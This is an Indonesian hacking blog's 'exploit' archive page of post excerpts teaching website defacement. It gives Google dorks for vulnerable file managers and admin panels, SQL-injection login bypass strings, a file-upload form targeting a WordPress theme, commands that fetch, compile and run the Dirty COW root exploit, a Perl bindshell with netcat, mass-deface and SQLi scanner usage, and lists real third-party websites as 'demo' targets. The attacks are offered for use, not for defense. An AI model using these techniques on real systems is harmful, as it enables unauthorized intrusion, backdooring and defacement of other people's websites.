Alwdy

Postingan

Menampilkan postingan dengan label exploit

Cara Deface dengan FileManager

Dorks Klik: inurl:/filemanager/ include" inurl:/filemanager/ intext:"dialog.php" inurl:/js/filemanager/ intext:"dialog.php" inurl:/assets/filemanager/ intext:"dialog.php" index of /assets/filemanager/ site:? [Tambain sendiri sitenya] Upload : Html - image - text - [Bypass ex] .php.fla , .php;.txt .etc Exploit : /dialog.php DEMO : http://dilernet.com.tr/filemanager/dialog.php

Baca selengkapnya

Mass Deface After Rooting Server

Halo apakabar.. Mau Lanjutin Yang kemaren. Cara Mass Deface Setelah Root. Oke Sebelumnya Kalian Baca dulu Post yang ini Cara Simple Rooting Server Atau Cari di Google Kali ini MnH-Blog Rooting dengan DirtyCow & OS windows. Setelah Berhasil Rooted & Login ke Akun FireFart Upload Script Deface Kalian. Contoh di webtarget Kami memakai file id.htm Selanjutnya Upload lagi Script mass deface . Script Mass Download disini >>> Buka Terminal / Cmd kalian lalu ketikkan chmod +x mass ./mass Setelah Muncul tulisan your index path in the server ketikkan Current Dir WebTarget Kalian & nama File Script deface kalian. /home/studyemirate/public_html/id.htm Enter The Patch to deface ketikkan /home/ Tunggu sampe Done ! Dan Kalian Cek semua Website yang berada 1 sever dengan web target di http://www.yougetsignal.com/tools/web-sites-on-web-server/ Sekian Semoga Bermanfaat...

Baca selengkapnya

Admin CMS Biz1m.com [NoRedirect]

Jadi Gw dapet Metode ini dari blog TkjCyberArt Untuk Metode Admin Page Noredirect Bisa Cek Post Gw yang ini Upshot Media Ltd AdminPage bypass [NoRedirect] Dork klik > " intext:Jumlah ahli ahli vip jumlah lawatan" Admin login Page : /admin-cp/ atau /admin-cp/logadmin.php Admin Page : /admin-cp.php Lalu Cek target.com /admin-cp.php Mungkin Nanti CMS ini Kebanyakan tidak ada Uploadernya. Jadi Kalian bisa Pakai Metode JSoverlay Silahkan Cek di Post ini Deface Metode JSOverLay Oke Selamat Mencoba.

Baca selengkapnya

Cara Simple Rooting Server

Beberapa hari kemarin gw Post Cara Backconnect dengan bindshell Jadi post gw ini lanjutan yang kemaren. Lumayan agak susah cari target yang kernel 2016 kebawah. Akhirnya Gw disini rooting pake Dirty COW Catatan : Tutorial ini Work dikernel 2016 kebawah oke langsung aja Setelah Backconnect berhasil. Kalian buat Direktori baru gw buat nya lewat CMD Ketikkan : mkdir sec cd sec Setelah berhasil membuat directory, saat nya Upload localroot dirty nya, kebetulan web target gw wget nya ON. jadi gw pake command wget [link] kalo ngga kalian bisa upload localroot nya manual. Ketikkan : wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c Setelah itu kita compile dirty.c pake command Ketikkan : gcc -pthread dirty.c -o dirty -lcrypt chmod +x dirty ./dirty Kalo berhasil ada tulisan please enter the new password : kalian masukkan password apa aja. dan tulisan seperti ini Nah kebetulan tadi waktu gw masukin password & mau login ke akun Firefart web target gw Di...

Baca selengkapnya

Cara Backconnect Dengan Bindshell [Rooting]

Backconnect ada banyak cara, Tadinya gw mau share BC with weevly. Tapi gw mau share yang ini dulu deh :D Oke langsung aja...... Jadi Yang paling penting disini kalian harus sudah punya Backdoor / Shell di dalam web target. Gw pake OS windows Bahan Bahannya : - Script Bindshell > DONLOT [save ex bindshell.pl] - Netcat > DONLOT [Pass magelang1337] - Shell WSO > DONLOT Note : Website harus PERL ON Kalo sudah selesai semua downloadnya ekstrak netcat di system C. Sekarang Kalian ke webtarget, Upload bindshell yg sudah download tadi ke webtarget. Setelah upload sukses, Sekarang jalankan Netcat nya Buka CMD - Ketik cd C:/nc - Ketik nc -vv IP target [Lihat di shell SERVER IP] [PORT] port bebas Gw Pake 1337 Jangan TEKAN ENTER dulu,, Sekarang menuju shell webtarget Ketik di Command / Execute : perl bindshell.pl [PORT] tekan enter Sekarang kita menuju ke CMD lalu tekan ENTER. hasil nya bash: no job control in this shell [SUCCESS] Nah untuk Rootin...

Baca selengkapnya

Withs Technosolutions Admin Login bypass

====================================================== # Exploit Title: Withs Technosolutions Admin Login bypass # Dorks : "Design by Withs Technosolutions" # Date: 2017-06-07 # Author: Codename # Vendor : http://www.withstechnosolutions.in/ ====================================================== Tutorial: [+] Dorking di google [+] Buka target [+] Masukan username & password [+] Username: '=''OR' Atau admin [+] Password: '=''OR' Atau admin ====================================================== Admin Page : sitetarget.com/admin/login.php Atau sitetarget.com/admin/login.aspx ====================================================== Upload Your Backdoors Or Script Html

Baca selengkapnya

WordPress Themes U-design File Upload

Dork: inurl:/wp-content/themes/[u/design OR u-design ] Exploit Title : WordPress Themes U-design File Upload Author : Mohammad peywasteh Tested : Win10 ------------------------------------------- Dork: inurl:/wp-content/themes/u-design << Klik >> Google Dork : inurl:/wp-content/themes/[u/design OR u-design ] Exploit : https://localhost/ wp-content/themes/[u/design OR u-design ]/scripts/admin/uploadify/uploadify.php Vulnerability : Exploit Page PoC : <form method="POST" action="https://localhost/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data"> <input type="file" name="Filedata" /> <button>Upload!</button><br/> </form> Klik >> https://ghostbin.com/paste/ov2md File Access : https://localhost/patch/shell.php

Baca selengkapnya

WTS Technologies Admin Login bypass

Malam Gan.. Gimana Puasanya Lancar kan ??? " Deface nya Lancar , Puasanya Bolong2 :D " Malam ini Ane mau share Tutor Deface Admin Login Bypass WTS Technologies. Simak Yak. Dorks nya : "Powered by WTS Technologies" Admin page nya ada di : www.sitetarget.com/console/ Username & Password : '=' 'OR' Dan Gw langsung Masuk admin panel nya... udah gt tinggal cari Uploader buat upload Backdoor nya. Gw coba Upload disitu.. Oke berhasil... inget ya Ga usah tebas2 index dehh.. Kalo ga di Backup mah :D Sekian sampe Ketemu lagi di Tutorial selanjutnya.. Greetz : - x404.hz - Trenggalek6etar - Lunatic0de - XnonGermx - nginxDEX - Vcry - StuxN3t - Kerens_id - Fx106 - Magelang6etar & All indonesia Defacer

Baca selengkapnya

WordPress Revslider Exploit and Mass Shell Upload

[+] Title : WordPress Revslider Exploit and Mass Shell Upload [+] Author : Fir3 H@wk [+] Tested on: Windows & Linux [+] Software : Perl [+] Video Link : https://www.youtube.com/watch?v=fznBn2JQ4VE ###################### # [+] DESCRIPTION : ###################### [+] Dork: inurl:/wp-content/plugins/revslider/ [+] Exploit: Code Download Link: http://www.mediafire.com/file/t3dwgp45ioma3cg/exploit.rar [+] If you face any problem you can watch this video Video

Baca selengkapnya

Upshot Media Ltd AdminPage bypass [NoRedirect]

Selamat malam Penggemar... ☻ Terima Kasih Buat Semua Defacer di tanah air yang udah bantu share ni Blog. Oke sekarang gw bakal share Metode Deface Adminpage Bypass with Noredirect. yang sebelumnya gw juga udah pernah share disini Deface Dengan admin page Desenvolvimento MW Way [No Redirect] Bahan Yang harus di persiapkan , Addons mozilla download DISINI Langsung Search di google.. Dorks : "Website design by Upshot Media Ltd" Buka web : Sitetarget.com/admin/ Setelah itu langsung buka Addons No redirect Lalu Copas Sitetarget.com/admin/ langsung klik OK . Buka lagi Sitetarget.com /admin/home.php Kalo vuln Tanpa Username & Password elo langsung masuk ke panel admin nya.. Tinggal upload Backdoors dah.... Demo : http://www.edwinsinstallations.co.uk/admin/ http://www.blanquette.co.uk/admin/ http://www.plesheyforgeltd.co.uk/admin/ http://www.oaktubs.com/admin/ http://www.eastcoastminiclub.co.uk/admin/ Note : Sayangnya di beberapa Site, Gw liat ga ada...

Baca selengkapnya

Deface dengan Ofek Technologies Admin Page bypass

Halo gaess.... Gw mw Share Tutor Buat yang mau belajar deface. :D Yok langsung Baca tutor nya. Dorks 1 : "Powered by Ofek Technologies" Dorks 2 : "Designed By Ofek Technologies" Home Admin : sitetarget.com/index.php/admin/login.html Masukin username&password Username : '=' 'or' Password : '=' 'or' Okeh langsung cari tempat uploader.. Buat upload Backdoors :D GoodLuck Gaees ! Demo : http://www.globalhotelsforsale.com/ http://www.nairswedding.in/ http://www.geovinsolutions.com/ http://www.sja.org.in http://www.syaa.in http://www.se7en.co.in/ Titip Gans "MagelangNoobsHackers" ..... zueheehe.....

Baca selengkapnya

Column Scanner SQLi dengan CMD di windows

Halo gan Lama ga share.. Hari ini gw mau share nih, Dapet tutor ini dari Anak T1KU5G0T. Yang Suka main SQLI tools ini sangat membantu. Tutor SQLi Elo bisa liat disini : Tutorial SQLi Manual + Admin Finder Kalo site udah vuln cari column ga usah pake "order by" caranya: 1. Download & install Xampp 2. Download Script Column Scanner Disini Xampp Udah elo install.. Script taroh di > local C > Xampp > Php. Gw Save pake Nama x.php biar gampang. Oke Selanjutnya Buka CMD nya. . Ketik : /cd /cd xampp /cd php Kalo udah di \user\xampp\php> Ketik : php x.php -url http://www.facialbaronline.com/services.php?p=1 -p 2 -c 30 -exec Setelah nunggu beberapa detik muncul Total column nya. di target gw ada 9 Column. Note : [!] Available Payloads 1 order by X-- 2 +order+by+X--+ 3 '+order+by+X-- Column Max Sampe 100 -url [isi site target] -p [Pilih Payloads] -c [total column yg d...

Baca selengkapnya

Lcnt Team Shell Upload Vulnerability

Halo Ganteng... Langsung ke tutorial ############################## # Exploit Title : Lcnt Team Shell Upload Vulnerability # Exploit Author : xBADGIRL21 # Dork : CopyRight 2006-2017 温州龙诚互联科技有限公司 Lcnt Team # Vendor : http://icnt.net # Tested on: [WIN7] ###################### # [+] Poc : ###################### # [!] Exploit : http://target.com/admin/pic_add.php?Element=shopspic # [!] Shell Path : http://target.com/admin/lcnt/[RANDOM_NUMBER].php ###################### # Discovered by : xBADGIRL21 Setelah Dapet target.. Langsung Exploit pake www.target.com / admin/pic_add.php?Element=shopspic Langsung upload Shell. nanti di sebelah kiri bakal nemu link untuk akses shell backdoornya. Berarti akses shell gw ada di www.target.com /admin/lcnt/1491924141.php Daann Jebret... Terserah mau di apain.. :D [!] Live Demo : http://www.chinaomay.com http://bisco.net.cn http://www.wzican.com http://www.raxinte.com video

Baca selengkapnya

WordPress Gravity Forms Plugin Exploit and File Upload

Posted by CxSecurity [+] Title : WordPress Gravity Forms Plugin Exploit and File Upload [+] Author : Fir3 H@wk [+] Tested on: Linux and Windows [+] Software : Perl [+] Video Link : https://www.youtube.com/watch?v=Nz3yUPFrmF8 ###################### # [+] DESCRIPTION : ###################### [+] Dork: inurl:/wp-content/plugins/gravityforms/ inurl:/wp-content/uploades/gravity_forms/ [+] Exploit: Code Download Link: http://www.mediafire.com/file/3xftnc6pufq9njz/exploit.rar [+] If you face any problem you can watch this video Video Link: https://www.youtube.com/watch?v=Nz3yUPFrmF8

Baca selengkapnya

Alwdy

Cari Blog Ini

Postingan

Pinned Post

Rekomendasi Game Simulator Kendaraan 2020 yang Tak Kalah Seru dari Sebelumnya

Cara Deface dengan FileManager

Mass Deface After Rooting Server

Admin CMS Biz1m.com [NoRedirect]

Cara Simple Rooting Server

Cara Backconnect Dengan Bindshell [Rooting]

Withs Technosolutions Admin Login bypass

WordPress Themes U-design File Upload

WTS Technologies Admin Login bypass

WordPress Revslider Exploit and Mass Shell Upload

Upshot Media Ltd AdminPage bypass [NoRedirect]

Deface dengan Ofek Technologies Admin Page bypass

Column Scanner SQLi dengan CMD di windows

Lcnt Team Shell Upload Vulnerability

WordPress Gravity Forms Plugin Exploit and File Upload